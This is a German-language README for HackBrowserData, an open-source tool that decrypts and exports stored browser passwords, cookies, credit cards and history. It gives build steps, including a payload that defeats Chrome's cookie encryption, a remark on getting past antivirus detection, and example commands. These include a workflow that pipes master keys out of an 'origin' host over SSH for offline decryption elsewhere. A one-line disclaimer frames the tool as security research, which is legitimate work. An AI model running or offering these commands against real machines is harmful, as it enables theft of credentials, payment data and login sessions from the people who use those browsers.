
Extrahiert und entschlüsselt Browserdaten, unterstützt mehrere Datentypen, ausführbar auf verschiedenen Betriebssystemen (macOS, Windows, Linux).
HackBrowserData ist ein Kommandozeilenwerkzeug zum Entschlüsseln und Exportieren von Browserdaten (Passwörter, Verlauf, Cookies, Lesezeichen, Kreditkarten, Download-Verlauf, localStorage, sessionStorage und Erweiterungen) aus dem Browser. Es unterstützt die gängigsten Chromium-basierten Browser und Firefox unter Windows, macOS und Linux sowie Safari unter macOS.
Es kann Daten auch plattform- und betriebssystemübergreifend entschlüsseln: Exportieren Sie die Master-Schlüssel auf dem Ursprungsrechner und entschlüsseln Sie dann eine Kopie der Daten offline auf einem beliebigen anderen Rechner – selbst für einen Browser, den das Betriebssystem des Analyse-Rechners nicht ausführen kann (siehe Plattformübergreifende Entschlüsselung).
Haftungsausschluss: Dieses Werkzeug dient ausschließlich der Sicherheitsforschung. Die Benutzer sind für alle rechtlichen und damit verbundenen Verpflichtungen verantwortlich, die aus der Nutzung dieses Werkzeugs entstehen. Der ursprüngliche Autor übernimmt keine rechtliche Haftung.
Unter macOS benötigen einige Chromium-basierte Browser ein aktuelles Benutzerpasswort zur Entschlüsselung.
Die Passwortentschlüsselung kann unter macOS 26.4 oder neuer fehlschlagen.
¹ Safari benötigt vollständigen Festplattenzugriff; aktivieren Sie dies unter Systemeinstellungen → Datenschutz & Sicherheit → Vollständiger Festplattenzugriff, falls die Extraktion leere Ergebnisse liefert.
² Unter Windows erfordert die Entschlüsselung von Chromium 127+-Cookies (Chrome / Chrome Beta / Edge / Brave / CocCoc) das App-Bound Encryption-Payload, das über
make build-windowserstellt wird – siehe Erstellen aus dem Quellcode weiter unten.³ Diese Browser sind nur unter Windows verfügbar, aber ihre Daten sind auf jedem Betriebssystem entschlüsselbar: Ziehen Sie die Dateien mit
archive, exportieren Sie die Schlüssel mitdumpkeysund entschlüsseln Sie dann unter macOS oder Linux mitrestore– siehe Plattformübergreifende Entschlüsselung.
Die Installation von HackBrowserData ist denkbar einfach: Laden Sie einfach die Version für Ihr System herunter und führen Sie die Binärdatei aus.
In einigen Situationen wird dieses Sicherheitswerkzeug vom Windows Defender oder anderen Antivirenprogrammen als Virus behandelt und kann nicht ausgeführt werden. Der gesamte Code ist Open Source. Sie können ihn selbst ändern und kompilieren.
Erfordert Go 1.20+.```bash
git clone https://github.com/moonD4rk/HackBrowserData
cd HackBrowserData
go build ./cmd/hack-browser-data/
#### Plattformübergreifender Build```bash
# For Windows (standard build, no Chromium 127+ ABE cookie support)
GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/
# For Linux
GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/
Chrome / Chrome Beta / Edge / Brave / CocCoc 127+ schützen Cookies mit App-Bound-Verschlüsselung. Das Entschlüsseln dieser Cookies erfordert ein kleines C-Payload — Zig (0.13+) wird als C-Toolchain empfohlen (das Makefile ruft zig cc auf). MinGW-w64 gcc kann die Quellen auch manuell erstellen, wenn Sie make payload umgehen.```bash
brew install zig # macOS scoop install zig # Windows (scoop)
make payload
make build-windows
Die resultierende `hack-browser-data.exe` enthält vollständige ABE-Cookie-Entschlüsselung auf Chromium 127+.
## Verwendung```
$ hack-browser-data -h
hack-browser-data decrypts and exports browser data from Chromium-based
browsers and Firefox on Windows, macOS, and Linux.
GitHub: https://github.com/moonD4rk/HackBrowserData
Usage:
hack-browser-data [flags]
hack-browser-data [command]
Available Commands:
archive Pack decryption-relevant profile files into a zip for cross-host restore
dump Extract and decrypt browser data (default command)
dumpkeys Export Chromium master keys as JSON for cross-host decryption
help Help about any command
list List detected browsers and profiles
restore Decrypt copied profile data using exported master keys
version Print version information
Flags:
-b, --browser string target browser: all|chrome|firefox|edge|... (default "all")
-c, --category string data categories (comma-separated): all|password,cookie,... (default "all")
-d, --dir string output directory (default "results")
-f, --format string output format: csv|json|cookie-editor (default "json")
-h, --help help for hack-browser-data
--keychain-pw string macOS keychain password
-p, --profile-path string custom profile dir path, get with chrome://version
-v, --verbose enable debug logging
--zip compress output to zip
Use "hack-browser-data [command] --help" for more information about a command.
dump - Browserdaten extrahieren und entschlüsseln (Standard)Wird hack-browser-data ohne Unterbefehl ausgeführt, wird standardmäßig dump verwendet.
--format cookie-editorschreibt nur Cookies als JSON-Array, das dem Importformat der Browsererweiterung Cookie-Editor entspricht; Nicht-Cookie-Kategorien werden übersprungen.
Entschlüsseln Sie Browserdaten auf einem Analysten-Host, die auf einem anderen Ursprungshost gesammelt wurden – einschließlich eines Browsers, dessen Engine das Betriebssystem des Analysten nicht einmal installieren kann (z. B. Entschlüsseln von Sogou- oder QQ-Browserdaten unter macOS). Nichts Plattformgebundenes (DPAPI, macOS Keychain, Chrome App-Bound Encryption) muss den Ursprung verlassen: Die Masterschlüssel werden einmal exportiert, und die Entschlüsselung erfolgt dann vollständig offline anhand einer Kopie der Daten.
Der Arbeitsablauf verwendet drei Befehle und zwei transportierbare Artefakte:
hack-browser-data dumpkeys -o keys.json hack-browser-data archive -o browser-data.zip
hack-browser-data restore --keys keys.json --data-zip browser-data.zip
> `keys.json` enthält die Master-Schlüssel im Klartext — behandeln Sie sie wie ein Geheimnis. `dumpkeys -o` schreibt sie mit Berechtigungen `0600`; ziehen Sie das Streamen über einen sicheren Kanal vor, anstatt sie auf der Festplatte zu belassen.
#### `dumpkeys` – Master-Schlüssel für die entschlüsselung auf anderen Rechnern exportieren
Leitet die Master-Schlüssel jeder Chromium-Installation auf dem Ursprungsrechner ab und schreibt sie als JSON (Firefox / Safari haben keinen portablen Schlüssel und werden übersprungen). Standardmäßig wird nach stdout ausgegeben, damit es über SSH weitergeleitet werden kann.
| Flag | Short | Default | Description |
|-----------------|-------|----------|-------------------------------------------------|
| `--browser` | `-b` | `all` | Zielbrowser (all\|chrome\|edge\|...) |
| `--output` | `-o` | *stdout* | Ausgabedatei (geschrieben mit `0600`); stdout, wenn weggelassen |
| `--keychain-pw` | | | macOS-Schlüsselbund-Passwort |
#### `archive` – Verschlüsselungsrelevante Dateien für den Transport packen
Sammelt nur die Dateien, die eine Wiederherstellung tatsächlich benötigt (Cookies, Anmeldedaten, Verlauf, …) über denselben Umgehungsmechanismus für gesperrte Dateien, der auch bei der Extraktion verwendet wird, sodass aktive SQLite-Dateien unter Windows sicher gelesen werden können. Das Zip-Archiv ist als `<browser-key>/<User Data layout>` strukturiert, sodass ein Archiv mehrere Browser enthalten kann und die Wiederherstellung eindeutig bleibt. Eintragsnamen verwenden immer Schrägstriche, sodass ein unter Windows erstelltes Archiv unter macOS / Linux wiederhergestellt werden kann.
| Flag | Short | Default | Description |
|--------------|-------|--------------------|-----------------------------------------|
| `--browser` | `-b` | `all` | Zielbrowser (all\|chrome\|edge\|...) |
| `--category` | `-c` | `all` | Datenkategorien, durch Kommas getrennt |
| `--output` | `-o` | `browser-data.zip` | Ausgabepfad des Archivs |
#### `restore` – Kopierte Daten mit exportierten Schlüsseln entschlüsseln
Stellt jede Chromium-Engine direkt aus `keys.json` wieder her und entschlüsselt die bereitgestellten Daten – es konsultiert niemals die lokale Browsertabelle des Analysten, daher **sind die Browser, die Sie wiederherstellen können, genau die Tresore in Ihrer `keys.json`**. Stellen Sie die Daten auf eine von zwei Arten bereit (genau eine ist erforderlich):
- `--data-zip` – ein von `archive` erstelltes Zip-Archiv; wird in ein temporäres Verzeichnis extrahiert und danach entfernt.
- `--data-dir` – ein Verzeichnis. Entweder das `archive`-Layout (`<browser-key>/...`, mehrere Browser auf einmal) oder das manuell kopierte `User Data`-Wurzelverzeichnis eines Browsers, was nur für einen einzelnen Browser eindeutig ist – daher kombinieren Sie es mit `-b`.
`-b` ist ein **optionaler Filter** über die Tresore des Dumps, kein erforderlicher Selektor.
| Flag | Short | Default | Description |
|--------------|-------|------------|------------------------------------------------------------|
| `--keys` | | *required* | Schlüsseldatei von `dumpkeys` (verwenden Sie `-` für stdin) |
| `--data-zip` | | | Zip-Archiv von `archive` (gegenseitig ausschließend mit `--data-dir`) |
| `--data-dir` | | | Kopiertes Datenverzeichnis (gegenseitig ausschließend mit `--data-zip`) |
| `--browser` | `-b` | | Nur diesen Browser wiederherstellen; muss einem Tresor in `--keys` entsprechen |
| `--category` | `-c` | `all` | Datenkategorien, durch Kommas getrennt |
| `--format` | `-f` | `json` | Ausgabeformat (csv\|json\|cookie-editor) |
| `--dir` | `-d` | `results` | Ausgabeverzeichnis |
| `--zip` | | `false` | Ausgabe in Zip komprimieren |
#### Beispiele für rechnerübergreifende Nutzung```bash
# Stream keys over SSH (no keys.json on disk), data copied separately
ssh origin "hack-browser-data dumpkeys" | \
hack-browser-data restore --keys - --data-zip browser-data.zip
# Restore one browser from a hand-copied User Data folder (no archive)
hack-browser-data restore --keys keys.json --data-dir ./chrome-userdata -b chrome
list - Erkannte Browser und Profile auflisten| Flag | Standard | Beschreibung |
|---|---|---|
--detail | false | Anzahl der Einträge pro Kategorie anzeigen |
version - Versionsinformationen anzeigen```bashhack-browser-data version
### Globale Flags
| Flag | Kurz | Beschreibung |
|-------------|------|--------------------------|
| `--verbose` | `-v` | Debug-Logging aktivieren |
### Beispiele```bash
# Extract all data from all browsers (default)
hack-browser-data
# Extract specific browser and categories
hack-browser-data dump -b chrome -c password,cookie
# Export in CSV format to a custom directory (JSON is the default)
hack-browser-data dump -b chrome -f csv -d output
# Export cookies in CookieEditor format
hack-browser-data dump -f cookie-editor
# Compress output to zip
hack-browser-data dump --zip
# List detected browsers and profiles
hack-browser-data list
# List with per-category entry counts
hack-browser-data list --detail
# Use custom profile path
hack-browser-data dump -b chrome -p "/path/to/User Data/Default"
Wir begrüßen und schätzen jeden Beitrag der Community (GitHub-Issues/Pull-Requests, E-Mail-Feedback usw.).
Bitte lies den Leitfaden für Beiträge bevor du beiträgst.
HackBrowserData ist ein Teil von 404Team StarLink-Galaxy. Wenn du Fragen zu HackBrowserData hast oder einen Kommunikationspartner suchst, wende dich bitte an die Starlink-Gruppe.

HackBrowserData wurde mit der GoLand IDE unter den kostenlosen JetBrains Open-Source-Lizenzen entwickelt, die von JetBrains s.r.o. gewährt wurden, wofür ich mich hiermit bedanken möchte.
| Kategorie | Chromium-basiert | Firefox | Safari |
|---|
| Passwort | ✅ | ✅ | ✅ |
| Cookie | ✅ | ✅ | ✅ |
| Lesezeichen | ✅ | ✅ | ✅ |
| Verlauf | ✅ | ✅ | ✅ |
| Download | ✅ | ✅ | ✅ |
| Kreditkarte | ✅ | - | - |
| Erweiterung | ✅ | ✅ | ✅ |
| LocalStorage | ✅ | ✅ | ✅ |
| SessionStorage | ✅ | - | - |
| Browser | Windows | macOS | Linux |
|---|
| Chrome | ✅² | ✅ | ✅ |
| Chrome Beta | ✅² | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ |
| Edge | ✅² | ✅ | ✅ |
| Brave | ✅² | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ |
| OperaGX | ✅ | ✅ | - |
| Vivaldi | ✅ | ✅ | ✅ |
| Yandex | ✅ | ✅ | - |
| CocCoc | ✅² | ✅ | - |
| Arc | ✅ | ✅ | - |
| DuckDuckGo³ | ✅ | - | - |
| QQ³ | ✅ | - | - |
| 360 ChromeX³ | ✅ | - | - |
| 360 Chrome³ | ✅ | - | - |
| DC Browser³ | ✅ | - | - |
| Sogou Explorer³ | ✅ | - | - |
| Firefox | ✅ | ✅ | ✅ |
| Safari¹ | - | ✅ | - |
| Flag | Short | Default | Beschreibung |
|---|
--browser | -b | all | Zielbrowser (all|chrome|firefox|edge|...) |
--category | -c | all | Datenkategorien, durch Komma getrennt (all|password|cookie|bookmark|history|download|creditcard|extension|localstorage|sessionstorage) |
--format | -f | json | Ausgabeformat (csv|json|cookie-editor) |
--dir | -d | results | Ausgabeverzeichnis |
--profile-path | -p | Benutzerdefinierter Profilverzeichnispfad, ermitteln mit chrome://version | |
--keychain-pw | macOS-Schlüsselbund-Passwort | ||
--zip | false | Ausgabe in ZIP komprimieren |
| Schritt | Host | Befehl | Erzeugt |
|---|
| 1 | origin | dumpkeys | keys.json — tragbare Masterschlüssel |
| 2 | origin | archive | browser-data.zip — nur die zur Entschlüsselung benötigten Dateien |
| 3 | analyst | restore | entschlüsselte Ausgabe (csv / json / cookie-editor) |
Roger |
Aquilao Official |
uinfziuna8n |
Cyrus |
stevenlele |
Carlo Mandelli |
slimwang |
zznQ |
YuXJ |
mirefly |
LC |
zhe6652 |
guoguangwu |
beichen |
Santiago Ramirez |
Ciprian Conache |
a-urth |
Amir. |